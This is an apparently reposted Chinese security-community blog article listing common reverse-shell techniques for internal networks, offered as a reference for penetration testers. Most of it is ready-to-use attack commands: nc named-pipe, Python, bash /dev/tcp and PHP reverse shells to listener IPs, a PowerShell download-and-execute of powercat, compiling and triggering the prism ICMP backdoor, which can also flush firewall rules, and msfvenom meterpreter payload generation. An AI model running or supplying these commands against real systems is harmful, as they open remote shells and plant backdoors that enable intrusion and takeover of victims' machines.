常用内网反弹shell方法一览

  • A+
所属分类:安全文章

作者:伟大宝宝 编辑:白帽子社区运营团队




    " 前言:为建设一个更加具有交流意义以及更开放的安全社区,白帽子社区公众号现在开始有偿收稿啦!更多具体信息请在公众号中回复“投稿”了解!


        白帽子社区CTF靶场(BMZCTF)已经开放,欢迎各位访问,在这里练习、学习,BMZCTF全身心为网络安全赛手提供优质学习环境,链接(http://www.bmzclub.cn/)

"    




本次整理了一些常用的反弹shell手段,供各位参考。



常用内网反弹shell方法一览
通过mknod创建管道反弹shell

linux下的nc中我们使用-e来反弹shell的时候会发现不存在-e参数。


常用内网反弹shell方法一览

在这种情况下可以通过创建管道,然后将默认shell环境的输入重定向给刚才创建的管道,最后将输出重定向到管道中。

mknod /tmp/bmz p/bin/bash 0</tmp/bmz | nc 192.168.88.131 1234 1>/tmp/bmz

常用内网反弹shell方法一览

我们已经可以接收到反弹的shell

常用内网反弹shell方法一览


常用内网反弹shell方法一览
通过Python反弹shell
同样我们也可以尝试使用python,因为linux默认安装了python
编写脚本
import socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "192.168.88.131" , 1234 ))os.dup2(s.fileno(), 0 )os.dup2(s.fileno(), 1 )os.dup2(s.fileno(), 2 )p = subprocess.call([ "/bin/bash" , "-i" ])
运行即可接收到shell
常用内网反弹shell方法一览


常用内网反弹shell方法一览
通过bash反弹shell
这是最为常用的一个反弹的方法
bash -i >& /dev/tcp/ip_address/port 0>&1

常用内网反弹shell方法一览


常用内网反弹shell方法一览
通过ICMP反弹shell

如果目标对流量协议进行了限制,也可以尝试采用ICMP协议进行反弹shell。因为通常情况下不会对ICMP协议进行封禁。

首先下载prism(公众号首页回复:“prism”获取下载地址)

下载完后会有这几个文件

常用内网反弹shell方法一览

其中prism.c是我们需要编译的后门文件,sendPacket.py用来触发后门,但是后门文件在我们编译前需要进行一下配置。

重点关注这几行

常用内网反弹shell方法一览

其中

define REVERSE_HOST用来设置监听主机的IP地址define REVERSE_PORT用来设置监听的端口

设置好以后上传到目标主机进行编译

编译的命令:

gcc <..OPTIONS..> -Wall -s -o prism prism.c

其中OPTIONS包含以下选项

-DDETACH         //后台运行-DSTATIC          //只用STATIC模式(默认是ICMP模式)-DNORENAME   //不再重命名进程名-DIPTABLES     //清除所有iptables规则表项

使用

gcc -DDETACH -Wall -s -o prism prism.c

编译后门

常用内网反弹shell方法一览

之后运行编译好的后门文件。

然后去运行

这个时候去运行我们的sendPacket.py

常用内网反弹shell方法一览

监听主机便会获取到反弹的shell

常用内网反弹shell方法一览


常用内网反弹shell方法一览
PowerShell反弹shell
Windows下的powercat反弹shell
下载powercat(公众号回复:“powercat”下载)
命令格式
powershell IEX (New-ObjectSystem.Net.Webclient).DownloadString('http://192.168.1.38/powercat.ps1'); powercat -c ip_addr -p port -e cmd

常用内网反弹shell方法一览
监听端获得反弹的shell
常用内网反弹shell方法一览


常用内网反弹shell方法一览
MSF生成后门反弹shell
msf以及CS的反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=195.1.7.23 LPORT=8888 -f exe > shell.exe
生成木马后使用exploit/multi/handler模块监听,选择对应后门的payload,配置好参数后开启监听。
在目标服务器运行生成的后门文件后就可以上线。


常用内网反弹shell方法一览
通过Cobaltstrike反弹shell
比较简单直接截图
常用内网反弹shell方法一览
生成后门后上传到目标主机,运行后即可上线。
通过PHP反弹shell
命令如下
php -r '$sock=fsockopen("192.168.1.38",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
常用内网反弹shell方法一览



往期精彩文章




RoarCTF部分题目WP
哈希传递攻击方法复现
记一次内网靶场的渗透
内网端口代理与转发




常用内网反弹shell方法一览
技术支持:白帽子社区团队
— 扫码关注我们 



本文始发于微信公众号(白帽子社区):常用内网反弹shell方法一览

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: